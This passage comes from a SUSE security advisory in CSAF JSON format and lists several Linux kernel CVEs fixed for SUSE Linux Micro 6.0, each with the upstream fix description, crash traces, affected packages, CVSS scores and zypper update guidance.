"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-38321"
},
{
"cve": "CVE-2025-38322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/intel: Fix crash in icl_update_topdown_event()\n\nThe perf_fuzzer found a hard-lockup crash on a RaptorLake machine:\n\n Oops: general protection fault, maybe for address 0xffff89aeceab400: 0000\n CPU: 23 UID: 0 PID: 0 Comm: swapper/23\n Tainted: [W]=WARN\n Hardware name: Dell Inc. Precision 9660/0VJ762\n RIP: 0010:native_read_pmc+0x7/0x40\n Code: cc e8 8d a9 01 00 48 89 03 5b cd cc cc cc cc 0f 1f ...\n RSP: 000:fffb03100273de8 EFLAGS: 00010046\n ....\n Call Trace:\n \u003cTASK\u003e\n icl_update_topdown_event+0x165/0x190\n ? ktime_get+0x38/0xd0\n intel_pmu_read_event+0xf9/0x210\n __perf_event_read+0xf9/0x210\n\nCPUs 16-23 are E-core CPUs that don\u0027t support the perf metrics feature.\nThe icl_update_topdown_event() should not be invoked on these CPUs.\n\nIt\u0027s a regression of commit:\n\n f9bdf1f95339 (\"perf/x86/intel: Avoid disable PMU if !cpuc-\u003eenabled in sample read\")\n\nThe bug introduced by that commit is that the is_topdown_event() function\nis mistakenly used to replace the is_topdown_count() call to check if the\ntopdown functions for the perf metrics feature should be invoked.\n\nFix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38322",
"url": "https://www.suse.com/security/cve/CVE-2025-38322"
},
{
"category": "external",
"summary": "SUSE Bug 1246447 for CVE-2025-38322",
"url": "https://bugzilla.suse.com/1246447"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-38322"
},
{
"cve": "CVE-2025-38379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix warning when reconnecting channel\n\nWhen reconnecting a channel in smb2_reconnect_server(), a dummy tcon\nis passed down to smb2_reconnect() with -\u003equery_interface\nuninitialized, so we can\u0027t call queue_delayed_work() on it.\n\nFix the following warning by ensuring that we\u0027re queueing the delayed\nworker from correct tcon.\n\nWARNING: CPU: 4 PID: 1126 at kernel/workqueue.c:2498 __queue_delayed_work+0x1d2/0x200\nModules linked in: cifs cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]\nCPU: 4 UID: 0 PID: 1126 Comm: kworker/4:0 Not tainted 6.16.0-rc3 #5 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-4.fc42 04/01/2014\nWorkqueue: cifsiod smb2_reconnect_server [cifs]\nRIP: 0010:__queue_delayed_work+0x1d2/0x200\nCode: 41 5e 41 5f e9 7f ee ff ff 90 0f 0b 90 e9 5d ff ff ff bf 02 00\n00 00 e8 6c f3 07 00 89 c3 eb bd 90 0f 0b 90 e9 57 f\u003e 0b 90 e9 65 fe\nff ff 90 0f 0b 90 e9 72 fe ff ff 90 0f 0b 90 e9\nRSP: 0018:ffffc900014afad8 EFLAGS: 00010003\nRAX: 0000000000000000 RBX: ffff888124d99988 RCX: ffffffff81399cc1\nRDX: dffffc0000000000 RSI: ffff888114326e00 RDI: ffff888124d999f0\nRBP: 000000000000ea60 R08: 0000000000000001 R09: ffffed10249b3331\nR10: ffff888124d9998f R11: 0000000000000004 R12: 0000000000000040\nR13: ffff888114326e00 R14: ffff888124d999d8 R15: ffff888114939020\nFS: 0000000000000000(0000) GS:ffff88829f7fe000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe7a2b4038 CR3: 0000000120a6f000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n queue_delayed_work_on+0xb4/0xc0\n smb2_reconnect+0xb22/0xf50 [cifs]\n smb2_reconnect_server+0x413/0xd40 [cifs]\n ? __pfx_smb2_reconnect_server+0x10/0x10 [cifs]\n ? local_clock_noinstr+0xd/0xd0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n process_one_work+0x4c5/0xa10\n ? __pfx_process_one_work+0x10/0x10\n ? __list_add_valid_or_report+0x37/0x120\n worker_thread+0x2f1/0x5a0\n ? __kthread_parkme+0xde/0x100\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x1fe/0x380\n ? kthread+0x10f/0x380\n ? __pfx_kthread+0x10/0x10\n ? local_clock_noinstr+0xd/0xd0\n ? ret_from_fork+0x1b/0x1f0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n ? rcu_is_watching+0x20/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x15b/0x1f0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\nirq event stamp: 1116206\nhardirqs last enabled at (1116205): [\u003cffffffff8143af42\u003e] __up_console_sem+0x52/0x60\nhardirqs last disabled at (1116206): [\u003cffffffff81399f0e\u003e] queue_delayed_work_on+0x6e/0xc0\nsoftirqs last enabled at (1116138): [\u003cffffffffc04562fd\u003e] __smb_send_rqst+0x42d/0x950 [cifs]\nsoftirqs last disabled at (1116136): [\u003cffffffff823d35e1\u003e] release_sock+0x21/0xf0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38379",
"url": "https://www.suse.com/security/cve/CVE-2025-38379"
},
{
"category": "external",
"summary": "SUSE Bug 1247030 for CVE-2025-38379",
"url": "https://bugzilla.suse.com/1247030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-38379"
},
{
"cve": "CVE-2025-38539",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38539"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Add down_write(trace_event_sem) when adding trace event\n\nWhen a module is loaded, it adds trace events defined by the module. It\nmay also need to modify the modules trace printk formats to replace enum\nnames with their values.\n\nIf two modules are loaded at the same time, the adding of the event to the\nftrace_events list can corrupt the walking of the list in the code that is\nmodifying the printk format strings and crash the kernel.\n\nThe addition of the event should take the trace_event_sem for write while\nit adds the new event.\n\nAlso add a lockdep_assert_held() on that semaphore in\n__trace_add_event_dirs() as it iterates the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38539",
"url": "https://www.suse.com/security/cve/CVE-2025-38539"
},
{
"category": "external",
"summary": "SUSE Bug 1248211 for CVE-2025-38539",
"url": "https://bugzilla.suse.com/1248211"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-38539"
},
{
"cve": "CVE-2025-38728",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38728"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb3: fix for slab out of bounds on mount to ksmbd\n\nWith KASAN enabled, it is possible to get a slab out of bounds\nduring mount to ksmbd due to missing check in parse_server_interfaces()\n(see below):\n\n BUG: KASAN: slab-out-of-bounds in\n parse_server_interfaces+0x14ee/0x1880 [cifs]\n Read of size 4 at addr ffff8881433dba98 by task mount/9827\n\n CPU: 5 UID: 0 PID: 9827 Comm: mount Tainted: G\n OE 6.16.0-rc2-kasan #2 PREEMPT(voluntary)\n Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE\n Hardware name: Dell Inc. Precision Tower 3620/0MWYPT,\n BIOS 2.13.1 06/14/2019\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x9f/0xf0\n print_report+0xd1/0x670\n __virt_addr_valid+0x22c/0x430\n ? parse_server_interfaces+0x14ee/0x1880 [cifs]\n ? kasan_complete_mode_report_info+0x2a/0x1f0\n ? parse_server_interfaces+0x14ee/0x1880 [cifs]\n kasan_report+0xd6/0x110\n parse_server_interfaces+0x14ee/0x1880 [cifs]\n __asan_report_load_n_noabort+0x13/0x20\n parse_server_interfaces+0x14ee/0x1880 [cifs]\n ? __pfx_parse_server_interfaces+0x10/0x10 [cifs]\n ? trace_hardirqs_on+0x51/0x60\n SMB3_request_interfaces+0x1ad/0x3f0 [cifs]\n ? __pfx_SMB3_request_interfaces+0x10/0x10 [cifs]\n ? SMB2_tcon+0x23c/0x15d0 [cifs]\n smb3_qfs_tcon+0x173/0x2b0 [cifs]\n ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs]\n ? cifs_get_tcon+0x105d/0x2120 [cifs]\n ? do_raw_spin_unlock+0x5d/0x200\n ? cifs_get_tcon+0x105d/0x2120 [cifs]\n ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs]\n cifs_mount_get_tcon+0x369/0xb90 [cifs]\n ? dfs_cache_find+0xe7/0x150 [cifs]\n dfs_mount_share+0x985/0x2970 [cifs]\n ? check_path.constprop.0+0x28/0x50\n ? save_trace+0x54/0x370\n ? __pfx_dfs_mount_share+0x10/0x10 [cifs]\n ? __lock_acquire+0xb82/0x2ba0\n ? __kasan_check_write+0x18/0x20\n cifs_mount+0xbc/0x9e0 [cifs]\n ? __pfx_cifs_mount+0x10/0x10 [cifs]\n ? do_raw_spin_unlock+0x5d/0x200\n ? cifs_setup_cifs_sb+0x29d/0x810 [cifs]\n cifs_smb3_do_mount+0x263/0x1990 [cifs]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38728",
"url": "https://www.suse.com/security/cve/CVE-2025-38728"
},
{
"category": "external",
"summary": "SUSE Bug 1249256 for CVE-2025-38728",
"url": "https://bugzilla.suse.com/1249256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-38728"
},
{
"cve": "CVE-2025-39689",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39689"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Also allocate and copy hash for reading of filter files\n\nCurrently the reader of set_ftrace_filter and set_ftrace_notrace just adds\nthe pointer to the global tracer hash to its iterator. Unlike the writer\nthat allocates a copy of the hash, the reader keeps the pointer to the\nfilter hashes. This is problematic because this pointer is static across\nfunction calls that release the locks that can update the global tracer\nhashes. This can cause UAF and similar bugs.\n\nAllocate and copy the hash for reading the filter files like it is done\nfor the writers. This not only fixes UAF bugs, but also makes the code a\nbit simpler as it doesn\u0027t have to differentiate when to free the\niterator\u0027s hash between writers and readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39689",
"url": "https://www.suse.com/security/cve/CVE-2025-39689"
},
{
"category": "external",
"summary": "SUSE Bug 1249307 for CVE-2025-39689",
"url": "https://bugzilla.suse.com/1249307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-39689"
},
{
"cve": "CVE-2025-39813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Fix potential warning in trace_printk_seq during ftrace_dump\n\nWhen calling ftrace_dump_one() concurrently with reading trace_pipe,\na WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race\ncondition.\n\nThe issue occurs because:\n\nCPU0 (ftrace_dump) CPU1 (reader)\necho z \u003e /proc/sysrq-trigger\n\n!trace_empty(\u0026iter)\ntrace_iterator_reset(\u0026iter) \u003c- len = size = 0\n cat /sys/kernel/tracing/trace_pipe\ntrace_find_next_entry_inc(\u0026iter)\n __find_next_entry\n ring_buffer_empty_cpu \u003c- all empty\n return NULL\n\ntrace_printk_seq(\u0026iter.seq)\n WARN_ON_ONCE(s-\u003eseq.len \u003e= s-\u003eseq.size)\n\nIn the context between trace_empty() and trace_find_next_entry_inc()\nduring ftrace_dump, the ring buffer data was consumed by other readers.\nThis caused trace_find_next_entry_inc to return NULL, failing to populate\n`iter.seq`. At this point, due to the prior trace_iterator_reset, both\n`iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal,\nthe WARN_ON_ONCE condition is triggered.\n\nMove the trace_printk_seq() into the if block that checks to make sure the\nreturn value of trace_find_next_entry_inc() is non-NULL in\nftrace_dump_one(), ensuring the \u0027iter.seq\u0027 is properly populated before\nsubsequent operations.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39813",
"url": "https://www.suse.com/security/cve/CVE-2025-39813"
},
{
"category": "external",
"summary": "SUSE Bug 1250032 for CVE-2025-39813",
